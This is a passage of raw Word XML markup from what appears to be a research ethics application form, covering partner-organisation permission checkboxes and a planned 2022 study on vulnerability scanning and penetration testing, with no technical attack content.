            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="721628F8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="48506529"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="572E9586" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1039408862"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="312B1105"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444F2BB7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="05D4331E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="38B9B541" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Permission to undertake the research has been provided by the partner organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="476B50A9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>(If YES attach copy)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B023942" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidDel="008461DD" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If NO the application cannot continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F5B9F53" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FC00DB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="185717742"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16B992E6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-912467415"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="68454404" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C4CD24A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2C2D50" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>Where research activity is carried out in collaboration with an external organisation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10490" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="6237"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="895"/>
        <w:gridCol w:w="947"/>
        <w:gridCol w:w="851"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="273A2C59" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="507"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2BD31408" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BB432B3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Does this organisation </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>have its own ethics approval</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> system?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B09D4EB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1279024073"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="333A17AF"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947" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56AB6605" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-711570112"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="0875B8AB"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4875BFB1" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC41CF5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w14:paraId="6797DFE8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If Yes, please attach a copy of any final approval (or interim approval) from the organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5715DC9C" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237DB49B" w14:textId="13EBC5F4" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION E: Details of Research Activity</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5817" w:type="pct"/>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3"/>
        <w:gridCol w:w="2326"/>
        <w:gridCol w:w="2326"/>
        <w:gridCol w:w="3008"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="6466334A" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="28866BF0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1093" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47E7908E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Indicative title:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3652" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19A18489" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>An investigation of a security stance using vulnerability scanning and penetration testing techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="364C5DBD" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FCA8E93" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1093" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58CC7E6F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Proposed start date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1109" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="381B4AC8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1.6.2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1109" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A10A810" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Proposed end date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C0C1347" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>29.9.2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="5DCBCBBB" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2AB4F86C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BAB1C20" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Introduction to the Research (maximum 300 words)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E62F01B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Ensure that you write for a </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Non-Specialist Audience</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> when outlining your response to the three points below:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A23F02" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t>Purpose of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F580BAA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t>Proposed Research Question</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC44DBA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t>Aims of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E6B1AA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t>Objectives of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653A791C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Demonstrate, briefly, how </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Existing Research</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> has informed the proposed activity and explain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F450369" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">What the research activity will add to the body of knowledge </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A09D9F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">How it addresses an area of importance. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidDel="002A152D" w14:paraId="073EF90C" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E539F25" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="190D42F5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
